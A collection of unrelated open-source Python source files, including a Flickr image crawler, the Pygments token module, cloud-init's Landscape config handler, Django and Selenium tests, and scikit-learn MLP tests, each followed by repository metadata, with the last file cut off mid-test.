if os.path.exists(self.indexOfUniqueUsers):
self.recentUsers = dict([(usr.replace('\n', ''), 1) for usr in open(self.indexOfUniqueUsers).readlines()])
print(('Index with', len(self.recentUsers), 'users is ready to use'))
else:
self.recentUsers = dict()
print(('No previous user index found at {}'.format(self.indexOfUniqueUsers)))
###########################################################################
# Find out if an image is a duplicate or of a user already visited
###########################################################################
def isDuplicateImage(self, flickrResult):
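        # Accept an image only if its constructed file name has not already
        # been accepted AND the owner has no other accepted photo taken on the
        # same date; otherwise report it as a duplicate.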
b = flickrResult
owner_date = b['owner'] + '_' + simpleDateFormat(b['datetaken'])
imgName = b['server'] + '_' + b['id'] + '_' + b['secret'] + '_' + owner_date + '.jpg'
alreadyIndexed = False
userPhotos = 0
if imgName in self.allImageNames:
alreadyIndexed = self.allImageNames[imgName]
else:
self.allImageNames[imgName] = False
if owner_date in self.recentUsers:
userPhotos = self.recentUsers[owner_date]
else:
self.recentUsers[owner_date] = 0
if (not alreadyIndexed) and userPhotos < 1:
self.recentUsers[owner_date] += 1
self.allImageNames[imgName] = True
return False
else:
return True
###########################################################################
#Find out if medium format of photo exists for download
###########################################################################
def get_url(self, flickrResult, fapi, size):
url = "https://farm{}.staticflickr.com/{}/{}_{}.jpg".format(flickrResult['farm'], flickrResult['server'], flickrResult['id'], flickrResult['secret'])
return True, url
#TODO find way to speed up actual url retrieval
# image_id = flickrResult['id']
# success = False
# try:
# rsp = fapi.photos_getSizes(api_key=self.flickrAPIKey, photo_id=image_id)
# fapi.testFailure(rsp)
# except:
# print sys.exc_info()[0]
# print ('Exception encountered while querying for urls\n')
# else:
# if getattr(rsp, 'sizes', None):
# if int(rsp.sizes[0]['candownload']) == 1:
# if getattr(rsp.sizes[0], 'size', None):
# for image_size in rsp.sizes[0].size:
# if image_size['label'] == size:
# return True, image_size['source']
#
# return False, ""
###########################################################################
# Update index of unique image names
###########################################################################
def updateImageNamesIndex(self, newImages):
with open(self.indexOfUniqueImages, 'a') as indexFile:
for img in newImages:
indexFile.write(img + '\n')
self.allImageNames = []
###########################################################################
# Main Method. This runs the crawler in an infinite loop
###########################################################################
def start(self):
socket.setdefaulttimeout(30) #30 second time out on sockets before they throw
self.cfg.log(self.homeDir, "CRAWLER STARTED")
while not self.do_exit:
try:
command = self.communication_q.get(False)
except Empty as e:
#Randomly choose flickrAPIkeys and flickrAPIsecrets
currentKey = int(math.floor(random.random()*len(self.flickrAPIkeys)))
# make a new FlickrAPI instance
fapi = FlickrAPI(self.flickrAPIkeys[currentKey], self.flickrAPIsecrets[currentKey])
num_queries = self.loadQueries()
if num_queries == 0:
break
newImages = []
# Set time variables
self.finalTime = int(time.time())
currentTimeWindow = self.finalTime - self.startTime
mintime = self.startTime + random.randint(0, currentTimeWindow)
maxtime = mintime + 3 * self.singleDay
print(('Since:', datetime.fromtimestamp(mintime)))
print(('Until:', datetime.fromtimestamp(maxtime)))
print(('Previous Users:', len(self.recentUsers)))
self.loadImageNamesIndex()
if len(self.allImageNames) > self.max_num_images:
print("Max Images reached")
break
# Search Images using the query terms
for current_tag in range(0, num_queries):
dirNumName = self.dbdir.uploadCurrentDirAndGetNext(self.imagesPerDir, self.queryTerms)
print(("Current Directory Number: ", dirNumName))
#form the query string.
query_string = self.queryTerms[current_tag]
print(('\n\nquery_string is ' + query_string))
                    #only visit a bounded number of pages per query (16 here), to try and avoid the dreaded duplicate bug.
                    #16 pages * 250 images = 4000 images, should be duplicate safe. Most interesting pictures will be taken first.
num_visit_pages = 16
pagenum = 1
while ( pagenum <= num_visit_pages ):
if (self.rate_q.qsize()>self.rate_limit):
#Age out time stamps older than one hour
found_all = False
while(not found_all):
next_stamp = self.rate_q.get()
if time.time() - next_stamp < 3600:
found_all = True
self.rate_q.put(next_stamp)
#Wait to age out time stamps if exceeded rate limit
if (self.rate_q.qsize()>self.rate_limit):
next_stamp = self.rate_q.get()
remaining_time = 3600 - (time.time() - next_stamp)
time.sleep(remaining_time)
self.rate_q.put(time.time()+60)
try:
rsp = fapi.photos_search(api_key=self.flickrAPIkeys[currentKey], ispublic="1", media="photos",
per_page=str(self.resultsPerPage), page=str(pagenum),
sort="interestingness-desc", text=query_string,
extras="tags, original_format, license, geo, date_taken, date_upload, o_dims, views, description",
min_upload_date=str(mintime),
max_upload_date=str(maxtime))
fapi.testFailure(rsp)
except KeyboardInterrupt:
print('Keyboard exception while querying for images, exiting\n')
raise
except (IOError, SSLError) as e:
print(('Error on Flickr photo request:{}\n'.format(e.strerror)))
except FlickrExpatError as e:
print(('Exception encountered while querying for images: {}\n'.format(e.message)))
print(('{}: {} to {} page {}\n'.format(query_string, mintime, maxtime, pagenum)))
print((e.xmlstr))
#I've identified two possible causes of this error: (1)Bad Gateway and (2)bad unicode characters in xml
time.sleep(5) #Waiting is best cure for bad gateway
pagenum = pagenum + 1 #Skipping to next page is best cure for bad character
#Just in case it has some connection to the rate limit, change the key
#Randomly choose flickrAPIkeys and flickrAPIsecrets
currentKey = int(math.floor(random.random()*len(self.flickrAPIkeys)))
# make a new FlickrAPI instance
fapi = FlickrAPI(self.flickrAPIkeys[currentKey], self.flickrAPIsecrets[currentKey])
self.flickrerrors += 1
if self.flickrerrors > 5:
print(("Too many Flickr Expat Errors in {}: Exiting".format(self.category)))
exit(1)
except Exception as e:
print((sys.exc_info()[0]))
print('Exception encountered while querying for images\n')
else:
# Process results
if getattr(rsp, 'photos', None):
if getattr(rsp.photos[0], 'photo', None):
random.shuffle(rsp.photos[0].photo)
for k in range(0, min(self.downloadsPerQuery, len(rsp.photos[0].photo))):
b = rsp.photos[0].photo[k]
if not self.isDuplicateImage(b):
isDownloadable, url = self.get_url(b, fapi, "Medium 640")
if isDownloadable:
b["url"] = url
self.queue.put((b, dirNumName))
print('Waiting threads')
self.queue.join()
while not self.out_queue.empty():
newImages.append(self.out_queue.get())
print((len(newImages), ' downloaded images'))
pagenum = pagenum + 1 #this is in the else exception block. It won't increment for a failure.
num_visit_pages = min(4, int(rsp.photos[0]['pages']))
# End While of Pages
# BEGIN: PROCESS DOWNLOADED IMAGES
self.updateImageNamesIndex(newImages)
else:
if command == "exit":
self.do_exit = True
print(("Wait for safe exit {}".format(self.category)))
print('End')
self.cfg.log(self.homeDir, "CRAWLER STOPPED")
|
crmauceri/VisualCommonSense
|
code/crawler/flickr_threads_toSQL.py
|
Python
|
mit
| 15,011
|
from tile import *
from board import *
class Player(object):
def __init__(self, name):
self.name = name
self.hand = TilePile()
print("New player " + self.name)
def add_to_hand(self, tile):
"""
Adds tile to hand.
"""
self.hand.add_tile(tile)
def remove_from_hand(self, tile):
"""
Removes tile from hand.
"""
self.hand.remove_tile(tile)
def other_player(self):
"""
Get pointer to the other player.
"""
for player in players:
if self.name != player.name:
return player
def play_randomly(self):
"""
Make a random move.
If hand is empty, move a piece.
If not, place a piece.
"""
if self.hand.is_empty():
self.move_random_piece()
else:
self.place_random_piece()
def place_random_piece(self):
"""
Places a random piece from the hand into the board.
"""
if not self.hand.is_empty():
played = False
while not played:
my_piece = self.hand.give_random_tile()
played = my_piece.place_randomly()
def move_random_piece(self):
"""
Move one of the Player pieces randomly.
"""
my_pieces = my_board.player_pieces(self)
if my_pieces != []:
played = False
while not played:
my_piece = random.choice(my_pieces)
played = my_piece.move_randomly()
def wins(self):
"""
Player wins!
"""
#TODO: Player.wins() should finish the game
print("WIN!")
sky_player = Player("sky")
land_player = Player("land")
players = [sky_player, land_player]
|
abenseny/ds
|
player.py
|
Python
|
mit
| 1,808
|
import logging
from pytos.common.base_types import XML_Object_Base, XML_List
from pytos.common.logging.definitions import XML_LOGGER_NAME
from pytos.common.definitions import xml_tags
from pytos.common.functions.xml import get_xml_text_value, get_xml_int_value, get_xml_node
from pytos.securetrack.xml_objects.rest.rules import Shadowed_Rule
logger = logging.getLogger(XML_LOGGER_NAME)
class Generic_Cleanup_List(XML_List):
def __init__(self, count, total, score, cleanups):
self.count = count
self.total = total
self.score = score
super().__init__(xml_tags.Elements.CLEANUPS, cleanups)
@classmethod
def from_xml_node(cls, xml_node):
"""
Initialize the object from a XML node.
:param xml_node: The XML node from which all necessary parameters will be parsed.
:type xml_node: xml.etree.Element
"""
count = get_xml_int_value(xml_node, xml_tags.Elements.COUNT)
total = get_xml_int_value(xml_node, xml_tags.Elements.TOTAL)
score = get_xml_int_value(xml_node, xml_tags.Elements.SCORE)
cleanups = []
for user_node in xml_node.iter(tag=xml_tags.Elements.CLEANUP):
cleanups.append(Generic_Cleanup.from_xml_node(user_node))
return cls(count, total, score, cleanups)
class Generic_Cleanup(XML_Object_Base):
def __init__(self, num_id, code, name, instances_total):
self.id = num_id
self.code = code
self.name = name
self.instances_total = instances_total
super().__init__(xml_tags.Elements.CLEANUP)
@classmethod
def from_xml_node(cls, xml_node):
"""
        Initialize the object from an XML node.
:param xml_node: The XML node from which all necessary parameters will be parsed.
:type xml_node: xml.etree.Element
"""
num_id = get_xml_int_value(xml_node, xml_tags.Elements.ID)
code = get_xml_text_value(xml_node, xml_tags.Elements.CODE)
name = get_xml_text_value(xml_node, xml_tags.Elements.NAME)
instances_total = get_xml_int_value(xml_node, xml_tags.Elements.INSTANCES_TOTAL)
return cls(num_id, code, name, instances_total)
class Cleanup_Set(XML_Object_Base):
def __init__(self, shadowed_rules_cleanup=None):
self.shadowed_rules_cleanup = shadowed_rules_cleanup
super().__init__(xml_tags.Elements.CLEANUP_SET)
@classmethod
def from_xml_node(cls, xml_node):
"""
        Initialize the object from an XML node.
:param xml_node: The XML node from which all necessary parameters will be parsed.
:type xml_node: xml.etree.Element
"""
shadowed_rules_cleanup = Shadowed_Rules_Cleanup.from_xml_node(
get_xml_node(xml_node, xml_tags.Elements.SHADOWED_RULES_CLEANUP))
return cls(shadowed_rules_cleanup)
class Shadowed_Rules_Cleanup(XML_Object_Base):
def __init__(self, shadowed_rules=None):
self.shadowed_rules = XML_List(xml_tags.Elements.SHADOWED_RULES, shadowed_rules)
super().__init__(xml_tags.Elements.SHADOWED_RULES_CLEANUP)
@classmethod
def from_xml_node(cls, xml_node):
"""
Initialize the object from a XML node.
:param xml_node: The XML node from which all necessary parameters will be parsed.
:type xml_node: xml.etree.Element
"""
shadowed_rules = XML_List(xml_tags.Elements.SHADOWED_RULES)
for shadowed_rule_node in xml_node.iter(tag=xml_tags.Elements.SHADOWED_RULE):
shadowed_rules.append(Shadowed_Rule.from_xml_node(shadowed_rule_node))
return cls(shadowed_rules)
|
Tufin/pytos
|
pytos/securetrack/xml_objects/rest/cleanups.py
|
Python
|
apache-2.0
| 3,635
|
# -*- coding: utf-8 -*-
"""
pygments.token
~~~~~~~~~~~~~~
Basic token types and the standard tokens.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
class _TokenType(tuple):
parent = None
def split(self):
buf = []
node = self
while node is not None:
buf.append(node)
node = node.parent
buf.reverse()
return buf
def __init__(self, *args):
# no need to call super.__init__
self.subtypes = set()
def __contains__(self, val):
return self is val or (
type(val) is self.__class__ and
val[:len(self)] == self
)
def __getattr__(self, val):
if not val or not val[0].isupper():
return tuple.__getattribute__(self, val)
new = _TokenType(self + (val,))
setattr(self, val, new)
self.subtypes.add(new)
new.parent = self
return new
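    # Attribute access builds the type hierarchy lazily; for example
    # (illustrative): Token.Literal.String.Double is created and cached on
    # first access, and Token.Literal.String.Double in Token.Literal.String
    # evaluates to True via __contains__ above.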
def __repr__(self):
return 'Token' + (self and '.' or '') + '.'.join(self)
Token = _TokenType()
# Special token types
Text = Token.Text
Whitespace = Text.Whitespace
Escape = Token.Escape
Error = Token.Error
# Text that doesn't belong to this lexer (e.g. HTML in PHP)
Other = Token.Other
# Common token types for source code
Keyword = Token.Keyword
Name = Token.Name
Literal = Token.Literal
String = Literal.String
Number = Literal.Number
Punctuation = Token.Punctuation
Operator = Token.Operator
Comment = Token.Comment
# Generic types for non-source code
Generic = Token.Generic
# String and some others are not direct children of Token.
# alias them:
Token.Token = Token
Token.String = String
Token.Number = Number
def is_token_subtype(ttype, other):
"""
Return True if ``ttype`` is a subtype of ``other``.
    Exists for backwards compatibility; use ``ttype in other`` instead.
"""
return ttype in other
def string_to_tokentype(s):
"""
Convert a string into a token type::
        >>> string_to_tokentype('String.Double')
        Token.Literal.String.Double
        >>> string_to_tokentype('Token.Literal.Number')
        Token.Literal.Number
        >>> string_to_tokentype('')
        Token
    Tokens that are already tokens are returned unchanged:
        >>> string_to_tokentype(String)
        Token.Literal.String
"""
if isinstance(s, _TokenType):
return s
if not s:
return Token
node = Token
for item in s.split('.'):
node = getattr(node, item)
return node
# Map standard token types to short names, used in CSS class naming.
# If you add a new item, please be sure to run this file to perform
# a consistency check for duplicate values.
STANDARD_TYPES = {
Token: '',
Text: '',
Whitespace: 'w',
Escape: 'esc',
Error: 'err',
Other: 'x',
Keyword: 'k',
Keyword.Constant: 'kc',
Keyword.Declaration: 'kd',
Keyword.Namespace: 'kn',
Keyword.Pseudo: 'kp',
Keyword.Reserved: 'kr',
Keyword.Type: 'kt',
Name: 'n',
Name.Attribute: 'na',
Name.Builtin: 'nb',
Name.Builtin.Pseudo: 'bp',
Name.Class: 'nc',
Name.Constant: 'no',
Name.Decorator: 'nd',
Name.Entity: 'ni',
Name.Exception: 'ne',
Name.Function: 'nf',
Name.Property: 'py',
Name.Label: 'nl',
Name.Namespace: 'nn',
Name.Other: 'nx',
Name.Tag: 'nt',
Name.Variable: 'nv',
Name.Variable.Class: 'vc',
Name.Variable.Global: 'vg',
Name.Variable.Instance: 'vi',
Literal: 'l',
Literal.Date: 'ld',
String: 's',
String.Backtick: 'sb',
String.Char: 'sc',
String.Doc: 'sd',
String.Double: 's2',
String.Escape: 'se',
String.Heredoc: 'sh',
String.Interpol: 'si',
String.Other: 'sx',
String.Regex: 'sr',
String.Single: 's1',
String.Symbol: 'ss',
Number: 'm',
Number.Float: 'mf',
Number.Hex: 'mh',
Number.Integer: 'mi',
Number.Integer.Long: 'il',
Number.Oct: 'mo',
Operator: 'o',
Operator.Word: 'ow',
Punctuation: 'p',
Comment: 'c',
Comment.Multiline: 'cm',
Comment.Preproc: 'cp',
Comment.Single: 'c1',
Comment.Special: 'cs',
Generic: 'g',
Generic.Deleted: 'gd',
Generic.Emph: 'ge',
Generic.Error: 'gr',
Generic.Heading: 'gh',
Generic.Inserted: 'gi',
Generic.Output: 'go',
Generic.Prompt: 'gp',
Generic.Strong: 'gs',
Generic.Subheading: 'gu',
Generic.Traceback: 'gt',
}
|
victoredwardocallaghan/pygments-main
|
pygments/token.py
|
Python
|
bsd-2-clause
| 5,731
|
from zope.interface import implementer
from zope.interface import alsoProvides
###############################################################################
# IO related
###############################################################################
from plumber import plumber
from node.behaviors import (
Adopt,
NodeChildValidate,
Nodespaces,
Attributes,
DefaultInit,
Nodify,
Reference,
Order,
OdictStorage,
)
class Node(object):
__metaclass__ = plumber
__plumbing__ = (
Adopt,
NodeChildValidate,
Nodespaces,
Attributes,
DefaultInit,
Nodify,
Reference,
Order,
OdictStorage,
)
from agx.core.interfaces import ISource
@implementer(ISource)
class SourceMock(Node):
pass
from agx.core.interfaces import ITarget
@implementer(ITarget)
class TargetMock(Node):
def __call__(self):
print '``__call__()`` of %s' % '.'.join(self.path)
for child in self:
child()
###############################################################################
# Transform related
###############################################################################
from node.interfaces import IRoot
from agx.core.interfaces import ITransform
@implementer(ITransform)
class TransformMock(object):
def __init__(self, name):
self.name = name
self._source = SourceMock('root')
self._target = TargetMock('root')
def source(self, path):
return self._source
def target(self, path):
return self._target
###############################################################################
# Generator related
###############################################################################
from agx.core import TargetHandler
class TargetHandlerMock(TargetHandler):
def __call__(self, source):
self.setanchor(source.path)
|
bluedynamics/agx.core
|
src/agx/core/testing/mock.py
|
Python
|
bsd-3-clause
| 1,940
|
# vi: ts=4 expandtab
#
# Copyright (C) 2011 Canonical Ltd.
# Copyright (C) 2012 Hewlett-Packard Development Company, L.P.
# Copyright (C) 2014 Amazon.com, Inc. or its affiliates.
#
# Author: Scott Moser <scott.moser@canonical.com>
# Author: Juerg Haefliger <juerg.haefliger@hp.com>
# Author: Andrew Jorgensen <ajorgens@amazon.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3, as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
from StringIO import StringIO
from configobj import ConfigObj
from cloudinit import type_utils
from cloudinit import util
from cloudinit.settings import PER_INSTANCE
frequency = PER_INSTANCE
LSC_CLIENT_CFG_FILE = "/etc/landscape/client.conf"
LS_DEFAULT_FILE = "/etc/default/landscape-client"
distros = ['ubuntu']
# defaults taken from stock client.conf in landscape-client 11.07.1.1-0ubuntu2
LSC_BUILTIN_CFG = {
'client': {
'log_level': "info",
'url': "https://landscape.canonical.com/message-system",
'ping_url': "http://landscape.canonical.com/ping",
'data_path': "/var/lib/landscape/client",
}
}
def handle(_name, cfg, cloud, log, _args):
"""
Basically turn a top level 'landscape' entry with a 'client' dict
and render it to ConfigObj format under '[client]' section in
/etc/landscape/client.conf
"""
ls_cloudcfg = cfg.get("landscape", {})
if not isinstance(ls_cloudcfg, (dict)):
        raise RuntimeError("'landscape' key existed in config,"
                           " but not a dictionary type,"
                           " is a %s instead"
                           % type_utils.obj_name(ls_cloudcfg))
if not ls_cloudcfg:
return
cloud.distro.install_packages(('landscape-client',))
merge_data = [
LSC_BUILTIN_CFG,
LSC_CLIENT_CFG_FILE,
ls_cloudcfg,
]
merged = merge_together(merge_data)
contents = StringIO()
merged.write(contents)
util.ensure_dir(os.path.dirname(LSC_CLIENT_CFG_FILE))
util.write_file(LSC_CLIENT_CFG_FILE, contents.getvalue())
log.debug("Wrote landscape config file to %s", LSC_CLIENT_CFG_FILE)
util.write_file(LS_DEFAULT_FILE, "RUN=1\n")
cloud.distro.service_control("landscape-client", "restart")
def merge_together(objs):
"""
merge together ConfigObj objects or things that ConfigObj() will take in
later entries override earlier
"""
cfg = ConfigObj({})
for obj in objs:
if not obj:
continue
if isinstance(obj, ConfigObj):
cfg.merge(obj)
else:
cfg.merge(ConfigObj(obj))
return cfg
|
henrysher/aws-cloudinit
|
cloudinit/config/cc_landscape.py
|
Python
|
gpl-3.0
| 3,109
|
from base import Setting, SettingSet
from django.utils.translation import ugettext as _
URLS_SET = SettingSet('urls', _('URL settings'), _("Some settings to tweak behaviour of site urls (experimental)."))
ALLOW_UNICODE_IN_SLUGS = Setting('ALLOW_UNICODE_IN_SLUGS', False, URLS_SET, dict(
label = _("Allow unicode in slugs"),
help_text = _("Allow unicode/non-latin characters in urls."),
required=False))
FORCE_SINGLE_URL = Setting('FORCE_SINGLE_URL', True, URLS_SET, dict(
label = _("Force single url"),
help_text = _("Redirect the request in case there is a mismatch between the slug in the url and the actual slug"),
required=False))
|
CLLKazan/iCQA
|
qa-engine/forum/settings/urls.py
|
Python
|
gpl-3.0
| 639
|
from flask import Blueprint
api = Blueprint('api', __name__)
from . import post
|
keithemiller/PVTA_Ride_Estimator
|
app/api/__init__.py
|
Python
|
mit
| 82
|
"""
Created on 6/05/2013
@author: thom
"""
from plot import Plot
from evaluator import Evaluator
import matplotlib.colors as colors
import logging
class PlotNewMoleculeTypes(Plot):
def draw_figure(self, f1, results_filename, **kwargs):
iterations = [0]
molecular_types_difference = [0]
cumulative_types = set()
count = 0
previous_count = 0
iteration = 0
for block in Evaluator.incr_load_results(results_filename):
for reaction in block['reactions']:
for product in reaction['products']:
if product['smiles'] not in cumulative_types:
count += 1
cumulative_types.add(product['smiles'])
iteration += 1
if iteration % 50 == 0:
difference = count-previous_count
previous_count = count
molecular_types_difference.append(difference)
iterations.append(reaction['t'])
# Append final values
if iteration % 50 != 0:
molecular_types_difference.append(count)
iterations.append(iteration)
initial_parameters = Evaluator.get_initial_parameters(results_filename)
ke = initial_parameters['initial_kinetic_energy'] / initial_parameters['initial_population'].get_population_size() * 1.0
logging.info("Initial average KE={}".format(ke))
ax = f1.add_subplot(1, 1, 1) # one row, one column, first plot
ax.set_title('New Molecular Types by time (initial average KE={:.2f})'.format(ke))
ax.set_xlabel('Time')
ax.set_ylabel('Number of New Types')
ax.set_xlim(left=0, right=iterations[-1])
ax.plot(iterations, molecular_types_difference, color=colors.cnames['slategray'], marker=',', linestyle='None')
ax.grid()
|
th0mmeke/toyworld
|
evaluators/plot_new_molecule_types.py
|
Python
|
gpl-3.0
| 1,888
|
# standard library
import re
# third party
from selenium import webdriver
from selenium.common.exceptions import NoSuchElementException
# Django
from django.contrib.staticfiles.testing import LiveServerTestCase
# local Django
from pom.pages.authenticationPage import AuthenticationPage
from pom.pages.volunteerProfilePage import VolunteerProfilePage
from volunteer.models import Volunteer
from shift.utils import create_volunteer_with_details
class VolunteerProfile(LiveServerTestCase):
    '''
    Browser-driven tests for viewing and editing a volunteer's profile page.
    '''
@classmethod
def setUpClass(cls):
cls.driver = webdriver.Firefox()
cls.driver.implicitly_wait(5)
cls.driver.maximize_window()
cls.profile_page = VolunteerProfilePage(cls.driver)
cls.authentication_page = AuthenticationPage(cls.driver)
super(VolunteerProfile, cls).setUpClass()
def setUp(self):
vol = ['Sherlock',"Sherlock","Holmes","221-B Baker Street","London","London-State","UK","9999999999","idonthave@gmail.com"]
self.v1 = create_volunteer_with_details(vol)
self.v1.unlisted_organization = 'Detective'
self.v1.save()
self.login_correctly()
self.profile_page.navigate_to_profile()
def tearDown(self):
pass
@classmethod
def tearDownClass(cls):
cls.driver.quit()
super(VolunteerProfile, cls).tearDownClass()
def login_correctly(self):
self.authentication_page.server_url = self.live_server_url
self.authentication_page.login({ 'username' : "Sherlock", 'password' : "volunteer"})
def test_details_tab(self):
profile_page = self.profile_page
page_source = self.driver.page_source
found_email = re.search(self.v1.email, page_source)
self.assertNotEqual(found_email, None)
found_city = re.search(self.v1.city, page_source)
self.assertNotEqual(found_city, None)
found_state = re.search(self.v1.state, page_source)
self.assertNotEqual(found_state, None)
found_country = re.search(self.v1.country, page_source)
self.assertNotEqual(found_country, None)
found_org = re.search(self.v1.unlisted_organization, page_source)
self.assertNotEqual(found_org, None)
def test_edit_profile(self):
profile_page = self.profile_page
profile_page.edit_profile()
new_details = ['Harvey', 'Specter', 'hspecter@ps.com', 'Empire State Building', 'NYC', 'New York', 'USA', '9999999998', 'None', 'Lawyer']
profile_page.fill_values(new_details)
page_source = self.driver.page_source
found_email = re.search(self.v1.email, page_source)
self.assertEqual(found_email, None)
found_city = re.search(self.v1.city, page_source)
self.assertEqual(found_city, None)
found_state = re.search(self.v1.state, page_source)
self.assertEqual(found_state, None)
found_country = re.search(self.v1.country, page_source)
self.assertEqual(found_country, None)
found_org = re.search(self.v1.unlisted_organization, page_source)
self.assertEqual(found_org, None)
found_email = re.search(new_details[2], page_source)
self.assertNotEqual(found_email, None)
found_city = re.search(new_details[4], page_source)
self.assertNotEqual(found_city, None)
found_state = re.search(new_details[5], page_source)
self.assertNotEqual(found_state, None)
found_country = re.search(new_details[6], page_source)
self.assertNotEqual(found_country, None)
found_org = re.search(new_details[9], page_source)
self.assertNotEqual(found_org, None)
# database check to ensure that profile has been updated
self.assertEqual(len(Volunteer.objects.all()), 1)
self.assertNotEqual(len(Volunteer.objects.filter(
first_name = new_details[0],
last_name = new_details[1],
email=new_details[2],
address = new_details[3],
city = new_details[4],
state = new_details[5],
country = new_details[6],
phone_number = new_details[7])), 0)
def test_upload_resume(self):
pass
'''
#Tested locally
profile_page = self.profile_page
profile_page.edit_profile()
profile_page.upload_resume('/home/jlahori/Downloads/water.pdf')
profile_page.submit_form()
self.assertEqual(profile_page.download_resume_text(),'Download Resume')
'''
def test_invalid_resume_format(self):
pass
'''
#Tested locally
profile_page = self.profile_page
profile_page.edit_profile()
profile_page.upload_resume('/home/jlahori/Downloads/ca.crt')
profile_page.submit_form()
self.assertEqual(profile_page.get_invalid_format_error(),'Uploaded file is invalid.')
'''
|
tulikavijay/vms
|
vms/volunteer/tests/test_volunteerProfile.py
|
Python
|
gpl-2.0
| 4,912
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
import os
from textwrap import dedent
from pants.backend.jvm.targets.jar_dependency import JarDependency
from pants.backend.jvm.targets.jar_library import JarLibrary
from pants.backend.jvm.targets.scala_library import ScalaLibrary
from pants.base.build_file_aliases import BuildFileAliases
from pants.goal.context import Context
from pants_test.jvm.jvm_tool_task_test_base import JvmToolTaskTestBase
from pants.contrib.spindle.targets.spindle_thrift_library import SpindleThriftLibrary
from pants.contrib.spindle.tasks.spindle_gen import SpindleGen
class SpindleGenTest(JvmToolTaskTestBase):
@classmethod
def task_type(cls):
return SpindleGen
@property
def alias_groups(self):
return BuildFileAliases.create(
targets={
'spindle_thrift_library': SpindleThriftLibrary,
'jar_library': JarLibrary,
},
objects={
'jar': JarDependency,
})
def test_smoke(self):
contents = dedent('''namespace java org.pantsbuild.example
struct Example {
1: optional i64 number
}
''')
self.create_file(relpath='test_smoke/a.thrift', contents=contents)
self.add_to_build_file('3rdparty', dedent('''
jar_library(
name = 'spindle-runtime',
jars = [
jar(org = 'com.foursquare', name = 'spindle-runtime_2.10', rev = '3.0.0-M7'),
],
)
'''
))
self.make_target(spec='test_smoke:a',
target_type=SpindleThriftLibrary,
sources=['a.thrift'])
target = self.target('test_smoke:a')
context = self.context(target_roots=[target])
task = self.execute(context)
build_path = os.path.join(task.workdir,
'scala_record',
'org',
'pantsbuild',
'example')
java_exists = os.path.isfile(os.path.join(build_path, 'java_a.java'))
scala_exists = os.path.isfile(os.path.join(build_path, 'a.scala'))
self.assertTrue(java_exists)
self.assertTrue(scala_exists)
|
digwanderlust/pants
|
contrib/spindle/tests/python/pants_test/contrib/spindle/tasks/test_spindle_gen.py
|
Python
|
apache-2.0
| 2,368
|
"""
Testing for Multi-layer Perceptron module (sklearn.neural_network)
"""
# Author: Issam H. Laradji
# License: BSD 3 clause
import sys
import warnings
import numpy as np
from numpy.testing import assert_almost_equal, assert_array_equal
from sklearn.datasets import load_digits, load_boston, load_iris
from sklearn.datasets import make_regression, make_multilabel_classification
from sklearn.exceptions import ConvergenceWarning
from sklearn.externals.six.moves import cStringIO as StringIO
from sklearn.metrics import roc_auc_score
from sklearn.neural_network import MLPClassifier
from sklearn.neural_network import MLPRegressor
from sklearn.preprocessing import LabelBinarizer
from sklearn.preprocessing import StandardScaler, MinMaxScaler
from scipy.sparse import csr_matrix
from sklearn.utils.testing import (assert_raises, assert_greater, assert_equal,
assert_false, ignore_warnings)
from sklearn.utils.testing import assert_raise_message
np.seterr(all='warn')
ACTIVATION_TYPES = ["identity", "logistic", "tanh", "relu"]
digits_dataset_multi = load_digits(n_class=3)
X_digits_multi = MinMaxScaler().fit_transform(digits_dataset_multi.data[:200])
y_digits_multi = digits_dataset_multi.target[:200]
digits_dataset_binary = load_digits(n_class=2)
X_digits_binary = MinMaxScaler().fit_transform(
digits_dataset_binary.data[:200])
y_digits_binary = digits_dataset_binary.target[:200]
classification_datasets = [(X_digits_multi, y_digits_multi),
(X_digits_binary, y_digits_binary)]
boston = load_boston()
Xboston = StandardScaler().fit_transform(boston.data)[: 200]
yboston = boston.target[:200]
iris = load_iris()
X_iris = iris.data
y_iris = iris.target
def test_alpha():
# Test that larger alpha yields weights closer to zero
X = X_digits_binary[:100]
y = y_digits_binary[:100]
alpha_vectors = []
alpha_values = np.arange(2)
absolute_sum = lambda x: np.sum(np.abs(x))
for alpha in alpha_values:
mlp = MLPClassifier(hidden_layer_sizes=10, alpha=alpha, random_state=1)
with ignore_warnings(category=ConvergenceWarning):
mlp.fit(X, y)
alpha_vectors.append(np.array([absolute_sum(mlp.coefs_[0]),
absolute_sum(mlp.coefs_[1])]))
for i in range(len(alpha_values) - 1):
assert (alpha_vectors[i] > alpha_vectors[i + 1]).all()
def test_fit():
# Test that the algorithm solution is equal to a worked out example.
X = np.array([[0.6, 0.8, 0.7]])
y = np.array([0])
mlp = MLPClassifier(solver='sgd', learning_rate_init=0.1, alpha=0.1,
activation='logistic', random_state=1, max_iter=1,
hidden_layer_sizes=2, momentum=0)
# set weights
mlp.coefs_ = [0] * 2
mlp.intercepts_ = [0] * 2
mlp.n_outputs_ = 1
mlp.coefs_[0] = np.array([[0.1, 0.2], [0.3, 0.1], [0.5, 0]])
mlp.coefs_[1] = np.array([[0.1], [0.2]])
mlp.intercepts_[0] = np.array([0.1, 0.1])
mlp.intercepts_[1] = np.array([1.0])
mlp._coef_grads = [] * 2
mlp._intercept_grads = [] * 2
# Initialize parameters
mlp.n_iter_ = 0
mlp.learning_rate_ = 0.1
# Compute the number of layers
mlp.n_layers_ = 3
# Pre-allocate gradient matrices
mlp._coef_grads = [0] * (mlp.n_layers_ - 1)
mlp._intercept_grads = [0] * (mlp.n_layers_ - 1)
mlp.out_activation_ = 'logistic'
mlp.t_ = 0
mlp.best_loss_ = np.inf
mlp.loss_curve_ = []
mlp._no_improvement_count = 0
mlp._intercept_velocity = [np.zeros_like(intercepts) for
intercepts in
mlp.intercepts_]
mlp._coef_velocity = [np.zeros_like(coefs) for coefs in
mlp.coefs_]
mlp.partial_fit(X, y, classes=[0, 1])
# Manually worked out example
# h1 = g(X1 * W_i1 + b11) = g(0.6 * 0.1 + 0.8 * 0.3 + 0.7 * 0.5 + 0.1)
# = 0.679178699175393
